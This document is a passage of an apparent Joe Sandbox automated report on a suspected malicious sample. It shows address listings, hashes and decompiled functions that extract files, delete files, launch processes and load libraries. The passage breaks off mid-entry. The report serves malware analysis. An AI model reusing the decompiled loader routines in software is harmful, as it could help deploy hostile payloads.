                      0x00407339
                      0x0040733c
                      0x00000000
                      0x00000000
                      0x00407342
                      0x00407346
                      0x00407349
                      0x00407349
                      0x00407349
                      0x00000000
                      0x00407349
                      0x004071c7
                      0x004071c9
                      0x004071cb
                      0x004071cd
                      0x004071d0
                      0x004071d1
                      0x004071d3
                      0x004071d5
                      0x004071d8
                      0x004071db
                      0x004071f1
                      0x004071f6
                      0x0040722e
                      0x0040722e
                      0x00407232
                      0x0040725e
                      0x00407260
                      0x00407267
                      0x0040726a
                      0x0040726d
                      0x0040726d
                      0x00407272
                      0x00407272
                      0x00407274
                      0x00407277
                      0x0040727e
                      0x00407281
                      0x004072ae
                      0x004072ae
                      0x004072b1
                      0x004072b4
                      0x00407328
                      0x00407328
                      0x00407328
                      0x00000000
                      0x00407328
                      0x004072b6
                      0x004072bc
                      0x004072bf
                      0x004072c2
                      0x004072c5
                      0x004072c8
                      0x004072cb
                      0x004072ce
                      0x004072d1
                      0x004072d4
                      0x004072d7
                      0x004072f0
                      0x004072f2
                      0x004072f5
                      0x004072f6
                      0x004072f9
                      0x004072fb
                      0x004072fe
                      0x00407300
                      0x00407302
                      0x00407305
                      0x00407307
                      0x0040730a
                      0x0040730e
                      0x00407310
                      0x00407310
                      0x00407311
                      0x00407314
                      0x00407317
                      0x004072d9
                      0x004072d9
                      0x004072e1
                      0x004072e6
                      0x004072e8
                      0x004072eb
                      0x004072eb
                      0x0040731a
                      0x00407321
                      0x004072ab
                      0x004072ab
                      0x004072ab
                      0x004072ab
                      0x00000000
                      0x00407323
                      0x00000000
                      0x00407323
                      0x00407321
                      0x00407234
                      0x00407237
                      0x00407239
                      0x0040723c
                      0x0040723f
                      0x00407242
                      0x00407244
                      0x00407247
                      0x0040724a
                      0x0040724a
                      0x0040724d
                      0x0040724d
                      0x00407250
                      0x00407257
                      0x0040722b
                      0x0040722b
                      0x0040722b
                      0x0040722b
                      0x00000000
                      0x00407259
                      0x00000000
                      0x00407259
                      0x00407257
                      0x004071dd
                      0x004071e0
                      0x004071e2
                      0x004071e5
                      0x00000000
                      0x00000000
                      0x00406f44
                      0x00406f44
                      0x00406f48
                      0x0040758d
                      0x00000000
                      0x0040758d
                      0x00406f4e
                      0x00406f51
                      0x00406f54
                      0x00406f57
                      0x00406f5a
                      0x00406f5d
                      0x00406f60
                      0x00406f62
                      0x00406f65
                      0x00406f68
                      0x00406f6b
                      0x00406f6d
                      0x00406f6d
                      0x00406f6d
                      0x00000000
                      0x00000000
                      0x004070cf
                      0x004070cf
                      0x004070d3
                      0x00407599
                      0x00000000
                      0x00407599
                      0x004070d9
                      0x004070dc
                      0x004070df
                      0x004070e2
                      0x004070e4
                      0x004070e4
                      0x004070e4
                      0x004070e7
                      0x004070ea
                      0x004070ed
                      0x004070f0
                      0x004070f3
                      0x004070f6
                      0x004070f7
                      0x004070f9
                      0x004070f9
                      0x004070f9
                      0x004070fc
                      0x004070ff
                      0x00407102
                      0x00407105
                      0x00407105
                      0x00407105
                      0x00407108
                      0x0040710a
                      0x0040710a
                      0x00000000
                      0x00000000
                      0x0040734c
                      0x0040734c
                      0x0040734c
                      0x00407350
                      0x00000000
                      0x00000000
                      0x00407356
                      0x00407359
                      0x0040735c
                      0x0040735f
                      0x00407361
                      0x00407361
                      0x00407361
                      0x00407364
                      0x00407367
                      0x0040736a
                      0x0040736d
                      0x00407370
                      0x00407373
                      0x00407374
                      0x00407376
                      0x00407376
                      0x00407376
                      0x00407379
                      0x0040737c
                      0x0040737f
                      0x00407382
                      0x00407385
                      0x00407389
                      0x0040738b
                      0x0040738e
                      0x00000000
                      0x00407390
                      0x0040710d
                      0x0040710d
                      0x00000000
                      0x0040710d
                      0x0040738e
                      0x004075c3
                      0x00000000
                      0x00000000
                      0x00406bf2
                      0x004075fa
                      0x004075fa
                      0x00000000
                      0x004075fa
                      0x00407447
                      0x004073ce
                      0x004073cb

                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                      • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                      • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                      • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E00403479(intOrPtr _a4) {
                      				intOrPtr _t11;
                      				signed int _t12;
                      				void* _t14;
                      				void* _t15;
                      				long _t16;
                      				void* _t18;
                      				intOrPtr _t31;
                      				intOrPtr _t34;
                      				intOrPtr _t36;
                      				void* _t37;
                      				intOrPtr _t49;
                      
                      				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
                      				 *0x42a26c = GetTickCount() + 0x1f4;
                      				if(_t34 <= 0) {
                      					L22:
                      					E0040302E(1);
                      					return 0;
                      				}
                      				E004035F8( *0x420f04);
                      				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                      				 *0x420f00 = _t34;
                      				 *0x420ef0 = 0;
                      				while(1) {
                      					_t31 = 0x4000;
                      					_t11 =  *0x420ef8 -  *0x420f04;
                      					if(_t11 <= 0x4000) {
                      						_t31 = _t11;
                      					}
                      					_t12 = E004035E2(0x414ef0, _t31);
                      					if(_t12 == 0) {
                      						break;
                      					}
                      					 *0x420f04 =  *0x420f04 + _t31;
                      					 *0x40ce80 = 0x414ef0;
                      					 *0x40ce84 = _t31;
                      					L6:
                      					L6:
                      					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                      						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
                      						E0040302E(0);
                      					}
                      					 *0x40ce88 = 0x40cef0;
                      					 *0x40ce8c = 0x8000; // executed
                      					_t14 = E00406BB0(0x40ce68); // executed
                      					if(_t14 < 0) {
                      						goto L20;
                      					}
                      					_t36 =  *0x40ce88; // 0x40cf2c
                      					_t37 = _t36 - 0x40cef0;
                      					if(_t37 == 0) {
                      						__eflags =  *0x40ce84; // 0x0
                      						if(__eflags != 0) {
                      							goto L20;
                      						}
                      						__eflags = _t31;
                      						if(_t31 == 0) {
                      							goto L20;
                      						}
                      						L16:
                      						_t16 =  *0x420ef4;
                      						if(_t16 -  *0x40ce60 + _a4 > 0) {
                      							continue;
                      						}
                      						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                      						goto L22;
                      					}
                      					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                      					if(_t18 == 0) {
                      						_push(0xfffffffe);
                      						L21:
                      						_pop(_t15);
                      						return _t15;
                      					}
                      					 *0x40ce60 =  *0x40ce60 + _t37;
                      					_t49 =  *0x40ce84; // 0x0
                      					if(_t49 != 0) {
                      						goto L6;
                      					}
                      					goto L16;
                      					L20:
                      					_push(0xfffffffd);
                      					goto L21;
                      				}
                      				return _t12 | 0xffffffff;
                      			}














                      0x00403489
                      0x0040349c
                      0x004034a1
                      0x004035d1
                      0x004035d3
                      0x00000000
                      0x004035d9
                      0x004034ad
                      0x004034c0
                      0x004034c6
                      0x004034cc
                      0x004034d7
                      0x004034dc
                      0x004034e1
                      0x004034e9
                      0x004034eb
                      0x004034eb
                      0x004034f4
                      0x004034fb
                      0x00000000
                      0x00000000
                      0x00403501
                      0x00403507
                      0x0040350d
                      0x00000000
                      0x00403513
                      0x00403519
                      0x00403539
                      0x0040353e
                      0x00403543
                      0x00403549
                      0x0040354f
                      0x00403559
                      0x00403560
                      0x00000000
                      0x00000000
                      0x00403562
                      0x00403568
                      0x0040356a
                      0x0040358d
                      0x00403593
                      0x00000000
                      0x00000000
                      0x00403595
                      0x00403597
                      0x00000000
                      0x00000000
                      0x00403599
                      0x00403599
                      0x004035ac
                      0x00000000
                      0x00000000
                      0x004035bb
                      0x00000000
                      0x004035bb
                      0x00403574
                      0x0040357b
                      0x004035c8
                      0x004035ce
                      0x004035ce
                      0x00000000
                      0x004035ce
                      0x0040357d
                      0x00403583
                      0x00403589
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004035cc
                      0x004035cc
                      0x00000000
                      0x004035cc
                      0x00000000

                      APIs
                      • GetTickCount.KERNEL32 ref: 0040348D
                        • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: FilePointer$CountTick
                      • String ID:
                      • API String ID: 1092082344-0
                      • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                      • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                      • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                      • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 41%
                      			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
                      				int _t9;
                      				long _t13;
                      				WCHAR* _t14;
                      
                      				_t14 = _a4;
                      				_t13 = E00406133(_t14);
                      				if(_t13 == 0xffffffff) {
                      					L8:
                      					return 0;
                      				}
                      				_push(_t14);
                      				if((_a8 & 0x00000001) == 0) {
                      					_t9 = DeleteFileW();
                      				} else {
                      					_t9 = RemoveDirectoryW(); // executed
                      				}
                      				if(_t9 == 0) {
                      					if((_a8 & 0x00000004) == 0) {
                      						SetFileAttributesW(_t14, _t13);
                      					}
                      					goto L8;
                      				} else {
                      					return 1;
                      				}
                      			}






                      0x00405d2d
                      0x00405d38
                      0x00405d3d
                      0x00405d6d
                      0x00000000
                      0x00405d6d
                      0x00405d44
                      0x00405d45
                      0x00405d4f
                      0x00405d47
                      0x00405d47
                      0x00405d47
                      0x00405d57
                      0x00405d63
                      0x00405d67
                      0x00405d67
                      0x00000000
                      0x00405d59
                      0x00000000
                      0x00405d5b

                      APIs
                        • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                        • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                      • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                      • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: File$Attributes$DeleteDirectoryRemove
                      • String ID:
                      • API String ID: 1655745494-0
                      • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                      • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                      • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                      • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00406AE0(void* __ecx, void* _a4) {
                      				long _v8;
                      				long _t6;
                      
                      				_t6 = WaitForSingleObject(_a4, 0x64);
                      				while(_t6 == 0x102) {
                      					E00406A71(0xf);
                      					_t6 = WaitForSingleObject(_a4, 0x64);
                      				}
                      				GetExitCodeProcess(_a4,  &_v8); // executed
                      				return _v8;
                      			}





                      0x00406af1
                      0x00406b08
                      0x00406afc
                      0x00406b06
                      0x00406b06
                      0x00406b13
                      0x00406b1f

                      APIs
                      • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                      • GetExitCodeProcess.KERNELBASE ref: 00406B13
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: ObjectSingleWait$CodeExitProcess
                      • String ID:
                      • API String ID: 2567322000-0
                      • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                      • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                      • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                      • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                      				long _v8;
                      				long _t21;
                      				long _t22;
                      				void* _t24;
                      				long _t26;
                      				int _t27;
                      				long _t28;
                      				void* _t29;
                      				void* _t30;
                      				long _t31;
                      				long _t32;
                      				long _t36;
                      
                      				_t21 = _a4;
                      				if(_t21 >= 0) {
                      					_t32 = _t21 +  *0x42a2b8;
                      					 *0x420ef4 = _t32;
                      					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                      				}
                      				_t22 = E00403479(4);
                      				if(_t22 >= 0) {
                      					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                      					if(_t24 == 0) {
                      						L18:
                      						_push(0xfffffffd);
                      						goto L19;
                      					} else {
                      						 *0x420ef4 =  *0x420ef4 + 4;
                      						_t36 = E00403479(_a4);
                      						if(_t36 < 0) {
                      							L21:
                      							_t22 = _t36;
                      						} else {
                      							if(_a12 != 0) {
                      								_t26 = _a4;
                      								if(_t26 >= _a16) {
                      									_t26 = _a16;
                      								}
                      								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                      								if(_t27 != 0) {
                      									_t36 = _v8;
                      									 *0x420ef4 =  *0x420ef4 + _t36;
                      									goto L21;
                      								} else {
                      									goto L18;
                      								}
                      							} else {
                      								if(_a4 <= 0) {
                      									goto L21;
                      								} else {
                      									while(1) {
                      										_t28 = _a4;
                      										if(_a4 >= 0x4000) {
                      											_t28 = 0x4000;
                      										}
                      										_v8 = _t28;
                      										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
                      										if(_t29 == 0) {
                      											goto L18;
                      										}
                      										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                      										if(_t30 == 0) {
                      											_push(0xfffffffe);
                      											L19:
                      											_pop(_t22);
                      										} else {
                      											_t31 = _v8;
                      											_a4 = _a4 - _t31;
                      											 *0x420ef4 =  *0x420ef4 + _t31;
                      											_t36 = _t36 + _t31;
                      											if(_a4 > 0) {
                      												continue;
                      											} else {
                      												goto L21;
                      											}
                      										}
                      										goto L22;
                      									}
                      									goto L18;
                      								}
                      							}
                      						}
                      					}
                      				}
                      				L22:
                      				return _t22;
                      			}















                      0x00403375
                      0x0040337e
                      0x00403387
                      0x0040338b
                      0x00403396
                      0x00403396
                      0x0040339e
                      0x004033a5
                      0x004033b7
                      0x004033be
                      0x00403463
                      0x00403463
                      0x00000000
                      0x004033c4
                      0x004033c7
                      0x004033d3
                      0x004033d7
                      0x00403471
                      0x00403471
                      0x004033dd
                      0x004033e0
                      0x0040343f
                      0x00403445
                      0x00403447
                      0x00403447
                      0x00403459
                      0x00403461
                      0x00403468
                      0x0040346b
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004033e2
                      0x004033e5
                      0x00000000
                      0x004033eb
                      0x004033f0
                      0x004033f7
                      0x004033fa
                      0x004033fc
                      0x004033fc
                      0x00403409
                      0x0040340c
                      0x00403413
                      0x00000000
                      0x00000000
                      0x0040341c
                      0x00403423
                      0x0040343b
                      0x00403465
                      0x00403465
                      0x00403425
                      0x00403425
                      0x00403428
                      0x0040342b
                      0x00403431
                      0x00403437
                      0x00000000
                      0x00403439
                      0x00000000
                      0x00403439
                      0x00403437
                      0x00000000
                      0x00403423
                      0x00000000
                      0x004033f0
                      0x004033e5
                      0x004033e0
                      0x004033d7
                      0x004033be
                      0x00403473
                      0x00403476

                      APIs
                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: FilePointer
                      • String ID:
                      • API String ID: 973152223-0
                      • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                      • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                      • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                      • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 69%
                      			E00401389(signed int _a4) {
                      				intOrPtr* _t6;
                      				void* _t8;
                      				void* _t10;
                      				signed int _t11;
                      				void* _t12;
                      				signed int _t16;
                      				signed int _t17;
                      				void* _t18;
                      
                      				_t17 = _a4;
                      				while(_t17 >= 0) {
                      					_t6 = _t17 * 0x1c +  *0x42a290;
                      					if( *_t6 == 1) {
                      						break;
                      					}
                      					_push(_t6); // executed
                      					_t8 = E00401434(); // executed
                      					if(_t8 == 0x7fffffff) {
                      						return 0x7fffffff;
                      					}
                      					_t10 = E0040136D(_t8);
                      					if(_t10 != 0) {
                      						_t11 = _t10 - 1;
                      						_t16 = _t17;
                      						_t17 = _t11;
                      						_t12 = _t11 - _t16;
                      					} else {
                      						_t12 = _t10 + 1;
                      						_t17 = _t17 + 1;
                      					}
                      					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                      						 *0x42924c =  *0x42924c + _t12;
                      						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
                      					}
                      				}
                      				return 0;
                      			}











                      0x0040138a
                      0x004013fa
                      0x0040139b
                      0x004013a0
                      0x00000000
                      0x00000000
                      0x004013a2
                      0x004013a3
                      0x004013ad
                      0x00000000
                      0x00401404
                      0x004013b0
                      0x004013b7
                      0x004013bd
                      0x004013be
                      0x004013c0
                      0x004013c2
                      0x004013b9
                      0x004013b9
                      0x004013ba
                      0x004013ba
                      0x004013c9
                      0x004013cb
                      0x004013f4
                      0x004013f4
                      0x004013c9
                      0x00000000

                      APIs
                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                      • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID:
                      • API String ID: 3850602802-0
                      • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                      • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                      • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                      • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00405C4B(WCHAR* _a4) {
                      				struct _PROCESS_INFORMATION _v20;
                      				int _t7;
                      
                      				0x426750->cb = 0x44;
                      				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
                      				if(_t7 != 0) {
                      					CloseHandle(_v20.hThread);
                      					return _v20.hProcess;
                      				}
                      				return _t7;
                      			}





                      0x00405c54
                      0x00405c74
                      0x00405c7c
                      0x00405c81
                      0x00000000
                      0x00405c87
                      0x00405c8b

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: CloseCreateHandleProcess
                      • String ID:
                      • API String ID: 3712363035-0
                      • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                      • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                      • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                      • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00406A35(signed int _a4) {
                      				struct HINSTANCE__* _t5;
                      				signed int _t10;
                      
                      				_t10 = _a4 << 3;
                      				_t8 =  *(_t10 + 0x40a410);
                      				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                      				if(_t5 != 0) {
                      					L2:
                      					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                      				}
                      				_t5 = E004069C5(_t8); // executed
                      				if(_t5 == 0) {
                      					return 0;
                      				}
                      				goto L2;
                      			}





                      0x00406a3d
                      0x00406a40
                      0x00406a47
                      0x00406a4f
                      0x00406a5b
                      0x00000000
                      0x00406a62
                      0x00406a52
                      0x00406a59
                      0x00000000
                      0x00406a6a
                      0x00000000

                      APIs
                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                        • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                        • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                        • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
